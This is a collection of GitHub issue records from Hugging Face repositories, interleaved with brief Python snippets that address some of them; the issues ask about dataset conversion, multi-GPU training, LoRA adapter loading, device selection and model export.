    "number": 761,
    "title": "How to convert from custom dataset format to LeRobotDataset format? ",
    "body": "I'm trying to train a LeRobot model on some custom data I've recorded on a custom robot, but first, I need to convert that custom data into the correct format for LeRobotDataset. I'm guessing that an example of how to do this is in the `pusht_zarr.py` file. \n\nQuestions:\n1) Is the example in `pusht_zarr.py` the proper way to do this dataset format conversion\n2) I only care about predicting future actions, so I don't need a `reward` or `success` field for each frame. Can I omit these fields or should I put a dummy value for them? e.g. in these lines of code below in `pusht_zarr.py`, can I omit the `next.reward` and `next.success` fields or must I put some dummy values for them? (and if so, what are the recommended dummy values?)\n```\nframe = {\n                \"action\": torch.from_numpy(action[i]),\n                # Shift reward and success by +1 until the last item of the episode\n                \"next.reward\": reward[i + (frame_idx < num_frames - 1)],\n                \"next.success\": success[i + (frame_idx < num_frames - 1)],\n            }\n```\n",
    "url": "https://github.com/huggingface/lerobot/issues/761",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-22T02:35:36Z",
    "updated_at": "2025-02-25T19:39:08Z",
    "user": "pqrsqwewrty"
  },
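On question 2 above, a hedged sketch of the dummy-value option: constant placeholders keep the frame schema intact, on the assumption that an action-prediction policy never reads them:

```python
import numpy as np
import torch

action = np.zeros((100, 6), dtype=np.float32)  # placeholder action trajectory
i = 0
frame = {
    "action": torch.from_numpy(action[i]),
    # Constant placeholders: the assumption is that action-prediction policies
    # never consume these, so any fixed value keeps the schema happy.
    "next.reward": 0.0,
    "next.success": False,
}
```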
  {
    "repo": "huggingface/trl",
    "number": 2922,
    "title": "How to support multi-device VLLM inference in the GRPO Trainer",
    "body": "https://github.com/huggingface/trl/blob/e5ae703d352b29537159180087ef8bd4b41bf625/trl/trainer/grpo_trainer.py#L439-L461\n\nIn the current GRPO implementation, VLLM can only run on a single GPU, which becomes a performance bottleneck. For example, in an 8-GPU setup, the remaining 7 GPUs have to wait for 1 GPU to complete inference, and it also can't accommodate larger models.\n\nHow can we enable VLLM to run on multiple GPUs? The only concern is that we need to figure out a way to update the parameters across multiple GPUs each time the model is reloaded:\n\nhttps://github.com/huggingface/trl/blob/e5ae703d352b29537159180087ef8bd4b41bf625/trl/trainer/grpo_trainer.py#L624-L653",
    "url": "https://github.com/huggingface/trl/issues/2922",
    "state": "open",
    "labels": [
      "\u2728 enhancement",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-02-21T09:24:51Z",
    "updated_at": "2025-03-14T02:45:21Z",
    "user": "0x404"
  },
  {
    "repo": "huggingface/safetensors",
    "number": 575,
    "title": "How to change the model weights in safetensors?",
    "body": "### Feature request\n\nFor example, I want to change some weight with shape [K,K,C] into [K,K,C/2], how can I achieve this hacking?\n\n### Motivation\n\nN/A\n\n### Your contribution\n\nN/A",
    "url": "https://github.com/huggingface/safetensors/issues/575",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-21T03:36:27Z",
    "updated_at": "2025-03-13T16:59:32Z",
    "user": "JulioZhao97"
  },
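For the reshape question above, the round-trip is straightforward with the eager helpers; the tensor key and the keep-first-half-of-C slicing below are just examples of the kind of surgery involved:

```python
from safetensors.torch import load_file, save_file

tensors = load_file("model.safetensors")  # eager dict of name -> tensor
w = tensors["some.block.weight"]          # hypothetical key with shape [K, K, C]
tensors["some.block.weight"] = w[..., : w.shape[-1] // 2].contiguous()  # -> [K, K, C/2]
save_file(tensors, "model.modified.safetensors")  # save_file requires contiguous tensors
```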
  {
    "repo": "huggingface/transformers.js",
    "number": 1201,
    "title": "Unable to convert Janus models to ONNX",
    "body": "### Question\n\nI see that @xenova has successfully export Janus-1.3B and Janus-Pro-1B to ONNX, presumably using some version of scripts/convert.py. We are interested in exporting Janus-Pro-7B to ONNX as well, but have not been able to do so using this script (nor any other path). Attempting to convert either of the previous two models encounters the same errors, so hopefully whatever steps were taken to convert those will also enable the 7B version. \n\nThe initial error was: \n```\nValueError: The checkpoint you are trying to load has model type `multi_modality` but Transformers does not recognize this architecture. This could be because of an issue with the checkpoint, or because your version of Transformers is out of date.\n```\nThis was fixed by installing https://github.com/deepseek-ai/Janus and adding \n`from janus.models import MultiModalityCausalLM` \nto convert.py.\n\nThe error that I'm now stuck at is:\n```\nKeyError: \"Unknown task: any-to-any. Possible values are: `audio-classification` for AutoModelForAudioClassification, `audio-frame-classification` for AutoModelForAudioFrameClassification, `audio-xvector` for AutoModelForAudioXVector, `automatic-speech-recognition` for ('AutoModelForSpeechSeq2Seq', 'AutoModelForCTC'), `depth-estimation` for AutoModelForDepthEstimation, `feature-extraction` for AutoModel, `fill-mask` for AutoModelForMaskedLM, `image-classification` for AutoModelForImageClassification, `image-segmentation` for ('AutoModelForImageSegmentation', 'AutoModelForSemanticSegmentation'), `image-to-image` for AutoModelForImageToImage, `image-to-text` for AutoModelForVision2Seq, `mask-generation` for AutoModel, `masked-im` for AutoModelForMaskedImageModeling, `multiple-choice` for AutoModelForMultipleChoice, `object-detection` for AutoModelForObjectDetection, `question-answering` for AutoModelForQuestionAnswering, `semantic-segmentation` for AutoModelForSemanticSegmentation, `text-to-audio` for ('AutoModelForTextToSpectrogram', 'AutoModelForTextToWaveform'), `text-generation` for AutoModelForCausalLM, `text2text-generation` for AutoModelForSeq2SeqLM, `text-classification` for AutoModelForSequenceClassification, `token-classification` for AutoModelForTokenClassification, `zero-shot-image-classification` for AutoModelForZeroShotImageClassification, `zero-shot-object-detection` for AutoModelForZeroShotObjectDetection\"\n```\n\n\nI can't find anything about optimum supporting this task, so it is unclear to me how @xenova was able to get around this. \nAny insight or assistance would be greatly appreciated. ",
    "url": "https://github.com/huggingface/transformers.js/issues/1201",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-20T17:55:00Z",
    "updated_at": "2025-08-19T12:55:58Z",
    "user": "turneram"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7415,
    "title": "Shard Dataset at specific indices",
    "body": "I have a dataset of sequences, where each example in the sequence is a separate row in the dataset (similar to LeRobotDataset). When running `Dataset.save_to_disk` how can I provide indices where it's possible to shard the dataset such that no episode spans more than 1 shard. Consequently, when I run `Dataset.load_from_disk`, how can I load just a subset of the shards to save memory and time on different ranks?\n\nI guess an alternative to this would be, given a loaded `Dataset`, how can I run `Dataset.shard` such that sharding doesn't split any episode across shards?",
    "url": "https://github.com/huggingface/datasets/issues/7415",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-20T10:43:10Z",
    "updated_at": "2025-02-24T11:06:45Z",
    "comments": 3,
    "user": "nikonikolov"
  },
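A sketch for the episode-aligned sharding question above: if the episode boundaries are known, contiguous `select` ranges can be saved as independent shards, each loadable on its own rank with `load_from_disk`. The toy data and boundary list are illustrative:

```python
from datasets import Dataset

# Toy stand-in: 10 frames across 3 episodes; episode_ends[i] is one past episode i's last row.
ds = Dataset.from_dict({"frame": list(range(10)), "episode": [0] * 3 + [1] * 4 + [2] * 3})
episode_ends = [3, 7, 10]

start = 0
for shard_idx, end in enumerate(episode_ends):
    # A contiguous range keeps every episode intact within its shard.
    ds.select(range(start, end)).save_to_disk(f"shards/shard_{shard_idx:05d}")
    start = end
```

Each rank can then `load_from_disk` only the shard directories it needs, which also answers the memory concern.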
  {
    "repo": "huggingface/trl",
    "number": 2913,
    "title": "How to specify the GPU used by vllm",
    "body": "https://github.com/huggingface/trl/blob/a92e00e810762548787fadd5c4a5e6fc13a4928a/trl/trainer/grpo_trainer.py#L392\nI have an 8-GPUs server, of which only the last two GPUs are available, and I set CUDA_VISIBLE_DEVICE=6,7, the value of torch.cuda.device_count() is 2. I want to load vllm into GPU 6, and I set vllm_device=cuda:6, but this line of code keeps giving an ValueError. What should I do?",
    "url": "https://github.com/huggingface/trl/issues/2913",
    "state": "closed",
    "labels": [
      "\u2753 question"
    ],
    "created_at": "2025-02-20T10:32:30Z",
    "updated_at": "2025-02-21T03:14:13Z",
    "user": "xiaolizh1"
  },
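The ValueError above likely comes from device re-indexing: once `CUDA_VISIBLE_DEVICES=6,7` is set, the process only sees two GPUs, renumbered from zero. A sketch of the corrected addressing (assuming TRL resolves `vllm_device` against the visible devices):

```python
import os

# Must be set before torch/vllm initialize CUDA.
os.environ["CUDA_VISIBLE_DEVICES"] = "6,7"

# After masking, physical GPU 6 is "cuda:0" and physical GPU 7 is "cuda:1"
# inside the process, so the config should name one of those, never "cuda:6".
vllm_device = "cuda:1"
```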
  {
    "repo": "huggingface/open-r1",
    "number": 381,
    "title": "how to set sampling parameters when do evaluation",
    "body": "As you said you use greedy decoding to reproduce deepseek's evaluation results, And I get different score, there may be something not  aligning. So I want to know how to set the sampling parameters and how to see them when I use the 'evaluate.py' to do evaluation. ",
    "url": "https://github.com/huggingface/open-r1/issues/381",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-20T08:41:26Z",
    "updated_at": "2025-02-24T06:57:59Z",
    "user": "ItGirls"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 380,
    "title": "How to set cuda device for your Data generation pipline",
    "body": "Hi author, thanks for your work.\nWhen I use your pipline to generate data set (deepseek-ai/DeepSeek-R1-Distill-Qwen-7B)\nI find I can not set device with os.environ\n\n![Image](https://github.com/user-attachments/assets/ff7bc85f-63a0-4618-80f0-f0516081e7ec)\n\nIt is actually always on the cude:0, how can I set it correctl? Thank you!",
    "url": "https://github.com/huggingface/open-r1/issues/380",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-20T07:06:44Z",
    "updated_at": "2025-02-20T07:06:44Z",
    "user": "Aristo23333"
  },
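The screenshot above suggests the usual pitfall: `CUDA_VISIBLE_DEVICES` only takes effect if it is set before torch/vllm initialize CUDA. A sketch of the required ordering:

```python
import os

# Set the mask first; doing this after `import torch` (or after vllm spins up)
# is too late, because the CUDA context is already pinned to GPU 0.
os.environ["CUDA_VISIBLE_DEVICES"] = "3"

import torch  # import only after the variable is set

print(torch.cuda.device_count())  # 1 -> physical GPU 3, addressed as "cuda:0"
```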
  {
    "repo": "huggingface/transformers",
    "number": 36293,
    "title": "Bug in v4.49 where the attention mask is ignored during generation (t5-small)",
    "body": "### System Info\n\nHi all!\n\nFirst, thank you very much for your hard work and making these features avalible.\n\nI'm seeing a bug after updating to v4.49 where the output changes even though the attention mask should be masking padded values. Below is a script to reproduce the error.\n\nIt will tokenize two prompts, and then call `.generate` on the shorter prompt while trying different slices of the padded `input_ids` and padded `attention_mask`. At some point, the generated response will change for v4.49 but not v4.48.\n\n\nEnviroment information\n```\n- `transformers` version: 4.49.0\n- Platform: macOS-15.3-arm64-arm-64bit\n- Python version: 3.10.13\n- Huggingface_hub version: 0.29.0\n- Safetensors version: 0.5.2\n- Accelerate version: not installed\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (GPU?): 2.6.0 (False)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: No\n```\n\noutput of `uv pip compile requirements.in`\n```\ntransformers==4.48.0         # change this to 4.49.0 to reproduce the error\n\nasttokens==3.0.0\ncertifi==2025.1.31\ncharset-normalizer==3.4.1\ndecorator==5.1.1\nexceptiongroup==1.2.2\nexecuting==2.2.0\nfilelock==3.17.0\nfsspec==2025.2.0\nhuggingface-hub==0.29.0\nidna==3.10\nipython==8.32.0\njedi==0.19.2\njinja2==3.1.5\nmarkupsafe==3.0.2\nmatplotlib-inline==0.1.7\nmpmath==1.3.0\nnetworkx==3.4.2\nnumpy==2.2.3\npackaging==24.2\nparso==0.8.4\npexpect==4.9.0\nprompt-toolkit==3.0.50\nptyprocess==0.7.0\npure-eval==0.2.3\npygments==2.19.1\npyyaml==6.0.2\nregex==2024.11.6\nrequests==2.32.3\nsafetensors==0.5.2\nsentencepiece==0.2.0\nstack-data==0.6.3\nsympy==1.13.1\ntokenizers==0.21.0\ntorch==2.6.0\ntqdm==4.67.1\ntraitlets==5.14.3\ntyping-extensions==4.12.2\nurllib3==2.3.0\nwcwidth==0.2.13\n```\n\n### Who can help?\n\n@ArthurZucker \n\n### Information\n\n- [x] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\nfrom transformers import AutoModelForSeq2SeqLM, AutoTokenizer, GenerationConfig\n\n\nmodel = AutoModelForSeq2SeqLM.from_pretrained(\"t5-small\")\ntokenizer = AutoTokenizer.from_pretrained(\"t5-small\")\n\ncfg = GenerationConfig(\n    max_new_tokens=512,\n    do_sample=False,\n    use_cache=True,    # same behavior with use_cache=False\n)\n\n\nshortprompt = (\"summarize: Transformers v4.49 appears to have a bug where .generate stops respecting \"\n               \"the attention_mask after some number of tokens.\")\nlongprompt = (\"summarize: I enjoy walking with my cute dog, especially in the early mornings \"\n              \"when the air is crisp and the streets are quiet. 
Watching my dog happily trot along, \"\n              \"always brings a smile to my face.\")\n\n# ---\nprint(\"# Single prompt ---\")\ninputs = tokenizer(\n    [shortprompt], return_tensors=\"pt\", padding=True\n)\n\noutputs = model.generate(**inputs, generation_config=cfg)\n\nexpected = tokenizer.batch_decode(outputs, skip_special_tokens=True)[0]\nprint(f\"short prompt: '{expected}'\")\nprint()\n\n\n# ---\nprint(\"# Double prompt ---\")\ninputs = tokenizer(\n    [shortprompt, longprompt], return_tensors=\"pt\", padding=True\n)\n\noutputs = model.generate(**inputs, generation_config=cfg)\n\ntext = tokenizer.batch_decode(outputs, skip_special_tokens=True)\nprint(f\"short prompt: '{text[0]}'\")\nprint(f\"long prompt: '{text[1]}'\")\nprint()\n\n# ---\nprint(\"# Single shortprompt with mask ---\")\ndef run_sliced_input(slice_, show_text=False):\n    shortprompt_tokens = inputs.input_ids[0:1, slice_]\n    shortprompt_mask = inputs.attention_mask[0:1, slice_]\n\n    outputs = model.generate(inputs=shortprompt_tokens, attention_mask=shortprompt_mask, generation_config=cfg)\n    text = tokenizer.batch_decode(outputs, skip_special_tokens=True)[0]\n    if show_text:\n        print(f\"'{text}'\")\n    return text != expected\n\n# run a bisect search to find the first slice that fails\nimport bisect\nstart = inputs.attention_mask[0].sum().item()\nfull_range = inputs.attention_mask.size(1)\nends = range(start, full_range)\nprint(f\"searching in range {start} to {full_range}\")\n\nfirst_failure = start + bisect.bisect_left(\n    [slice(None, end) for end in ends], True, key=run_sliced_input\n)\nif first_failure == full_range:\n    print(\"No failure found in the full range!\")\nelse:\n    print(f\"First failing slice: {first_failure}\")\n\n    print(f\"Output with slice at {first_failure-1}: \", end=\"\")\n    run_sliced_input(slice(None, first_failure-1), show_text=True)\n    print(f\"Output with slice at {first_failure}: \", end=\"\")\n    run_sliced_input(slice(None, first_failure), show_text=True)\n\n```\n\n### Expected behavior\n\nversion 4.48\n```\n# Single prompt ---\nshort prompt: 'v4.49 appears to have a bug where.generate stops respecting the attention_mask after some tokens.'\n\n# Double prompt ---\nshort prompt: 'v4.49 appears to have a bug w",
    "url": "https://github.com/huggingface/transformers/issues/36293",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-02-20T02:16:23Z",
    "updated_at": "2025-02-20T16:28:11Z",
    "user": "bdhammel"
  },
  {
    "repo": "huggingface/optimum-nvidia",
    "number": 176,
    "title": "How to run whisper after #133",
    "body": "I see that previously, whisper could be run as follows: [https://github.com/huggingface/optimum-nvidia/blob/whisper-inference/examples/automatic-speech-recognition/whisper.py](https://github.com/huggingface/optimum-nvidia/blob/whisper-inference/examples/automatic-speech-recognition/whisper.py)\n\n\nBut after #133 the code has been significantly refactored. Is there any documentation that shows how to properly run whisper with a tensorRT backend?\n\n```python\nfrom optimum.nvidia.pipelines import pipeline\nasr = pipeline(\"automatic-speech-recognition\", model=\"openai/whisper-base\", device=device)\n> NotImplementedError: Model type whisper is not currently supported\n```\n\n```python\nfrom optimum.nvidia.models.whisper import WhisperForConditionalGeneration\nmodel = WhisperForConditionalGeneration.from_pretrained(\"openai/whisper-base\", torch_dtype=torch_dtype)\n> AttributeError: type object 'WhisperForConditionalGeneration' has no attribute 'from_pretrained'\n```\n",
    "url": "https://github.com/huggingface/optimum-nvidia/issues/176",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-19T17:45:01Z",
    "updated_at": "2025-02-19T17:45:01Z",
    "user": "huggingfacename"
  },
  {
    "repo": "huggingface/peft",
    "number": 2388,
    "title": "ValueError: Target module Qwen2_5_VisionTransformerPretrainedModel is not supported.",
    "body": "## Context\nI'm finetuning the Qwen2.5-Vl model with swift for data extraction using LoRA. I'm not sure what is the correct way to save and upload the adapter and be able to recharge it correctly.\nIn short, I followed these steps\n```python\n# load model\nmodel, processor = get_model_tokenizer(\n    'Qwen/Qwen2.5-VL-3B-Instruct',\n    torch_dtype=torch.bfloat16,\n    use_hf=True,\n    attn_impl=\"flash_attn\",\n)\n# get lora \n...\nmodel_arch = get_model_arch(model.model_meta.model_arch)\nlora_config = LoraConfig(\n    task_type='CAUSAL_LM',\n    r=4,\n    lora_alpha=8,\n    lora_dropout=0.05,\n    use_rslora=True,\n    target_modules=get_multimodal_target_regex(\n      model_arch,\n      freeze_llm=False,\n      freeze_vit=False,\n      freeze_aligner=True\n    ),\n)\nmodel = Swift.prepare_model(model, lora_config)\n# train config e run\n...\ntrainer = Seq2SeqTrainer(\n    model=model,\n    args=training_args,\n    data_collator=template.data_collator,\n    train_dataset=train_dataset,\n    eval_dataset=val_dataset,\n    template=template,\n    callbacks= [\n        EarlyStoppingCallback(\n            early_stopping_patience=6,\n            early_stopping_threshold=0.001\n        )\n    ]\n)\nstats = trainer.train()\n# push adapter\nmodel.push_to_hub(f\"tech4humans/{model_name}\", private=True)\n```\ndebugging the peft model was loaded with the class `PeftModelForCausalLM`.\n\n## Problem \n Then after I tried to recharge the adapter and I get an error with peft\n```python\nfrom transformers import Qwen2_5_VLForConditionalGeneration\nmodel = Qwen2_5_VLForConditionalGeneration.from_pretrained(\"Qwen/Qwen2.5-VL-3B-Instruct\", device_map=\"auto\") \nmodel.load_adapter(\"tech4humans/Qwen2.5-VL-3B-Instruct-r4-tuned\")\n``` \n```python\n/usr/local/lib/python3.10/dist-packages/peft/tuners/lora/model.py in _create_new_module(lora_config, adapter_name, target, **kwargs)\n    345         if new_module is None:\n    346             # no module could be matched\n--> 347             raise ValueError(\n    348                 f\"Target module {target} is not supported. Currently, only the following modules are supported: \"\n    349                 \"`torch.nn.Linear`, `torch.nn.Embedding`, `torch.nn.Conv1d`, `torch.nn.Conv2d`, `torch.nn.Conv3d`, \".\n\nValueError: Target module Qwen2_5_VisionTransformerPretrainedModel(\n  (patch_embed): Qwen2_5_VisionPatchEmbed(\n    (proj): Conv3d(3, 1280, kernel_size=(2, 14, 14), stride=(2, 14, 14), bias=False)\n  )\n  (rotary_pos_emb): Qwen2_5_VisionRotaryEmbedding()\n  (blocks): ModuleList(\n    (0-31): 32 x Qwen2_5_VLVisionBlock(\n      (norm1): Qwen2RMSNorm((1280,), eps=1e-06)\n      (norm2): Qwen2RMSNorm((1280,), eps=1e-06)\n      (attn): Qwen2_5_VLVisionSdpaAttention(\n        (qkv): Linear(in_features=1280, out_features=3840, bias=True)\n        (proj): Linear(in_features=1280, out_features=1280, bias=True)\n      )\n      (mlp): Qwen2_5_VLMLP(\n        (gate_proj): Linear(in_features=1280, out_features=3420, bias=True)\n        (up_proj): Linear(in_features=1280, out_features=3420, bias=True)\n        (down_proj): Linear(in_features=3420, out_features=1280, bias=True)\n        (act_fn): SiLU()\n      )\n    )\n  )\n  (merger): Qwen2_5_VLPatchMerger(\n    (ln_q): Qwen2RMSNorm((1280,), eps=1e-06)\n    (mlp): Sequential(\n      (0): Linear(in_features=5120, out_features=5120, bias=True)\n      (1): GELU(approximate='none')\n      (2): Linear(in_features=5120, out_features=2048, bias=True)\n    )\n  )\n) is not supported. 
Currently, only the following modules are supported: `torch.nn.Linear`, `torch.nn.Embedding`, `torch.nn.Conv1d`, `torch.nn.Conv2d`, `torch.nn.Conv3d`, `transformers.pytorch_utils.Conv1D`, `torch.nn.MultiheadAttention.`.\n```\n\n## Sytem info\n```\ntransformers 4.50.0.dev0\npeft 0.14.1.dev0\nms-swift 3.2.0.dev0\nPython 3.10.12\nCUDA Version: 12.6\n```\nAm I missing something or doing something wrong? Any pointers would be appreciated. Thanks!",
    "url": "https://github.com/huggingface/peft/issues/2388",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-19T15:09:17Z",
    "updated_at": "2025-04-09T16:23:53Z",
    "comments": 8,
    "user": "samuellimabraz"
  },
  {
    "repo": "huggingface/trl",
    "number": 2905,
    "title": "How to use GRPOTrainer to train a LLM for code generation? What is the format of the dataset?",
    "body": "",
    "url": "https://github.com/huggingface/trl/issues/2905",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-19T12:38:13Z",
    "updated_at": "2025-02-19T12:38:13Z",
    "user": "xiangxinhello"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 370,
    "title": "how to train grpo on 2 nodes(16gpus)",
    "body": "how to train grpo on 2 nodes(16gpus)? 10000 thanks for giving a successful example.",
    "url": "https://github.com/huggingface/open-r1/issues/370",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-19T09:15:14Z",
    "updated_at": "2025-03-26T11:36:03Z",
    "user": "glennccc"
  },
  {
    "repo": "huggingface/finetrainers",
    "number": 267,
    "title": "How to save the best performing checkpoint during LoRA fine-tuning on Hunyuan Video?",
    "body": "In the HunyuanVideo training scripts, we can save checkpoints every 500 steps by passing `--checkpointing_steps 500`. The final model is saved through the following code:\n\n```python\nif accelerator.is_main_process:\n    transformer = unwrap_model(accelerator, self.transformer)\n\n    if self.args.training_type == \"lora\":\n        transformer_lora_layers = get_peft_model_state_dict(transformer)\n\n        self.model_config[\"pipeline_cls\"].save_lora_weights(\n            save_directory=self.args.output_dir,\n            transformer_lora_layers=transformer_lora_layers,\n        )\n    else:\n        transformer.save_pretrained(os.path.join(self.args.output_dir, \"transformer\"))\n```\n(Reference: https://github.com/a-r-r-o-w/finetrainers/blob/4bb10c62324aef4fbac85bb381acb9f6f39a5076/finetrainers/trainer.py#L837C1-L848C95)\n\nMy question is: How can I ensure that I save the best performing model during LoRA fine-tuning? The final saved model might not be the best, as the loss could fluctuate during training. The same applies to intermediate checkpoints. Is there a recommended approach for tracking and saving the best-performing model?",
    "url": "https://github.com/huggingface/finetrainers/issues/267",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-19T07:49:11Z",
    "updated_at": "2025-02-21T01:39:30Z",
    "user": "dingangui"
  },
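finetrainers does not appear to expose a best-checkpoint option in the quoted code, so here is a generic sketch of the usual pattern: track the best validation loss and save only on improvement (nothing below is finetrainers API; `save_fn` stands in for whatever checkpointing call the trainer provides):

```python
import math

class BestCheckpointTracker:
    """Generic sketch: save a checkpoint only when validation loss improves."""

    def __init__(self):
        self.best = math.inf

    def update(self, step: int, val_loss: float, save_fn) -> bool:
        if val_loss < self.best:
            self.best = val_loss
            save_fn(f"checkpoints/best-step-{step}")  # overwrite/rotate as preferred
            return True
        return False

# usage inside a training loop (illustrative):
# tracker = BestCheckpointTracker()
# tracker.update(step, validation_loss, save_fn=my_save_checkpoint)
```

Note that a fluctuating training loss is a poor selection signal; the tracker should be fed a held-out validation loss or a sample-quality metric.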
  {
    "repo": "huggingface/lerobot",
    "number": 748,
    "title": "[pi0] confusion about the state embedding dimension in `embed_suffix`",
    "body": "### System Info\n\n```Shell\n- `lerobot` version: 0.1.0\n- Platform: Linux-5.14.0-284.86.1.el9_2.x86_64-x86_64-with-glibc2.35\n- Python version: 3.11.11\n- Huggingface_hub version: 0.28.1\n- Dataset version: 3.2.0\n- Numpy version: 1.26.4\n- PyTorch version (GPU?): 2.6.0+cu124 (True)\n- Cuda version: 12040\n- Using GPU in script?: Yes\n```\n\n### Information\n\n- [x] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nIn the model definition of `modeling_pi0.py`,[ line 567](https://github.com/huggingface/lerobot/blob/fe483b1d0d4ad8506f61924d905943eaa6d3ece0/lerobot/common/policies/pi0/modeling_pi0.py#L567), we see that\n\n```\n# Embed state\nstate_emb = self.state_proj(state)\nstate_emb = state_emb.to(dtype=torch.bfloat16)\nembs.append(state_emb[:, None, :])\nbsize = state_emb.shape[0]\ndtype = state_emb.dtype\ndevice = state_emb.device\n```\n\nWe see that the state embedding dimension is bumped up at the 1st dimension.\n\nThe problem is, models like pi0 usually use datasets that have `n_obs_steps.`, which is the default of LeRobot's own datasets as well. For example, if I use the `pusht` dataset as specified in this LeRobot example [script](https://github.com/huggingface/lerobot/blob/main/examples/3_train_policy.py), we see that the dimension of the dataset looks something like this\n```\nimage shape torch.Size([64, 2, 3, 96, 96])\nstate shape torch.Size([64, 2, 2])\naction shape torch.Size([64, 16, 2])\n```\n\nThe first 2 in the dimensions of image and state come from the fact that the dataset gives you two frames of the past in one batch. The 16 in action comes from the fact that diffusion policy has an action horizon of 16 frames in the future.\n\nNow, if we train on dataset like this or any similar dataset, it would have a dimension mismatch in `embed_suffix` because it would bump the state_embedding and give you something like\n```\nRuntimeError: Tensors must have same number of dimensions: got 4 and 3\n```\n\nFor pi0 it's more or less okay, because the default n_obs_steps is usually 1, so you can squeeze out the 1st dimension of state, but this current way doesn't seem very expendable in the future, and also not consistent with LeRobot's usual dataset format.\n\n### Expected behavior\n\nI would like to hear some reasoning behind the design choice like this so I can know if I am misunderstanding something. \n\nThank you very much in advance!",
    "url": "https://github.com/huggingface/lerobot/issues/748",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-02-19T03:33:01Z",
    "updated_at": "2025-10-20T02:31:45Z",
    "user": "IrvingF7"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1198,
    "title": "whisper: how to get streaming word level timestamps? (automatic-speech-recognition)",
    "body": "### Question\n\n## Goal\n- streaming\n- word level timestamps\n\n## Issue\n`on_chunk_start` / `on_chunk_end` are not called when using `return_timestamps: \"word\"`. \nThese callbacks only provide timestamps with `return_timestamps: true`\n\nI also tried to decode tokens, as I\u2019ve seen it in the demo, but that uses callbacks that no longer exist (e.g. `chunk_callback(chunk)` and `callback_function(item)`)\n\n## Setup\n\n\n```ts\nconst transcriber = await pipeline(\n  \"automatic-speech-recognition\",\n  \"Xenova/whisper-tiny\",\n  {\n    device: \"webgpu\",\n   }\n);\n```\n\n\n```ts\ntoken_callback_function: (tokens) => {\n  const { feature_extractor } = transcriber.processor;\n  const { config: modelConfig } = transcriber.model;\n  \n  const time_precision = feature_extractor.config.chunk_length / modelConfig.max_source_positions;\n\n  if (tokens) {\n    const data = transcriber.tokenizer._decode_asr(\n      [{ tokens, finalised: false }],\n      {\n        time_precision,\n        return_timestamps: true,\n        force_full_sequences: false,\n      }\n    );\n\n    console.log(\"data\", data);\n  }\n};\n```\n\nDecoding works, but timestamps are null.\n\n\"Image\"",
    "url": "https://github.com/huggingface/transformers.js/issues/1198",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-18T15:29:42Z",
    "updated_at": "2025-02-20T04:45:48Z",
    "user": "getflourish"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10817,
    "title": "auto_pipeline missing SD3 contol nets",
    "body": "### Describe the bug\n\nHey, auto_pipeline seesm to be missing the control nets variants for SD3\n\nvenv\\Lib\\site-packages\\diffusers\\pipelines\\auto_pipeline.py\n\n### Reproduction\n\nLoad an sd3 model checkpoint with a controlnet loading any of the auto pipes you will just get the none control net variations as its not set in the configuration.\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.32.2\n- Platform: Windows-10-10.0.19045-SP0\n- Running on Google Colab?: No\n- Python version: 3.12.7\n- PyTorch version (GPU?): 2.5.1+cu124 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.27.1\n- Transformers version: 4.48.0\n- Accelerate version: 1.2.1\n- PEFT version: not installed\n- Bitsandbytes version: 0.45.2\n- Safetensors version: 0.5.2\n- xFormers version: not installed\n- Accelerator: NVIDIA GeForce RTX 3080 Ti, 12288 MiB\n- Using GPU in script?: \n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/10817",
    "state": "closed",
    "labels": [
      "bug",
      "help wanted",
      "contributions-welcome"
    ],
    "created_at": "2025-02-18T12:54:40Z",
    "updated_at": "2025-02-24T16:21:03Z",
    "comments": 3,
    "user": "JoeGaffney"
  },
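Until the mapping is added to auto_pipeline, the SD3 controlnet classes can be named explicitly; a sketch (the model IDs are examples):

```python
import torch
from diffusers import SD3ControlNetModel, StableDiffusion3ControlNetPipeline

# Bypass AutoPipeline and instantiate the controlnet-aware pipeline directly.
controlnet = SD3ControlNetModel.from_pretrained(
    "InstantX/SD3-Controlnet-Canny", torch_dtype=torch.float16
)
pipe = StableDiffusion3ControlNetPipeline.from_pretrained(
    "stabilityai/stable-diffusion-3-medium-diffusers",
    controlnet=controlnet,
    torch_dtype=torch.float16,
)
```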
  {
    "repo": "huggingface/lerobot",
    "number": 746,
    "title": "How should I run the model on my own datasets in different envs which is not clearly mentioned in the README?",
    "body": "I want to run the diffusion model on my own real world arms datasets, which are different from the example env and input format in observation and action dims.\n\nI've seem some yaml files to store these parameters in earlier version of the repo, but I can't find it in the newest version of the repo. So should I write this params myself in some yaml-like or json-like files or there are some new ways to solve these problems. \n\nThis is my first issue in github, so the format may be informal, but I'm really eager for the answers. \nThank you for your answers!!!",
    "url": "https://github.com/huggingface/lerobot/issues/746",
    "state": "closed",
    "labels": [
      "question",
      "policies",
